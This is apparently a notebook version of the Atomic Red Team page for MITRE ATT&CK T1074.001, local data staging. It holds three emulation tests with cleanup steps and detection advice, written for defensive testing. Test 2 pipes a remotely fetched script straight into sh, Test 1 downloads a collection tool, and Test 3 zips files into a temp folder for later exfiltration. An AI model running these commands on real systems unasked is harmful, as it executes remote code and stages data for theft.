# T1074.001 - Local Data Staging
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)

## Atomic Tests

### Atomic Test #1 - Stage data from Discovery.batUtilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
verify that the file is saved in the temp directory.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile $env:TEMP\discovery.bat
```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 1

#### Cleanup: 
```powershell
Remove-Item -Force $env:TEMP\discovery.bat -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Stage data from Discovery.sh
Utilize curl to download discovery.sh and execute a basic information gathering shell script

**Supported Platforms:** linux, macos
#### Dependencies:  Run with `sh`!
##### Description: Check if curl is installed on the machine.

##### Check Prereq Commands:
```sh
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi

```
##### Get Prereq Commands:
```sh
which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl

```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > /tmp/T1074.001_discovery.log
```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 2

#### Cleanup: 
```sh
rm /tmp/T1074.001_discovery.log
```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Zip a Folder with PowerShell for Staging in TempUse living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
was placed in the temp directory.
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
Compress-Archive -Path "PathToAtomicsFolder\T1074.001\bin\Folder_to_zip" -DestinationPath $env:TEMP\Folder_to_zip.zip -Force
```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 3

#### Cleanup: 
```powershell
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1074.001 -TestNumbers 3 -Cleanup

## Detection
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.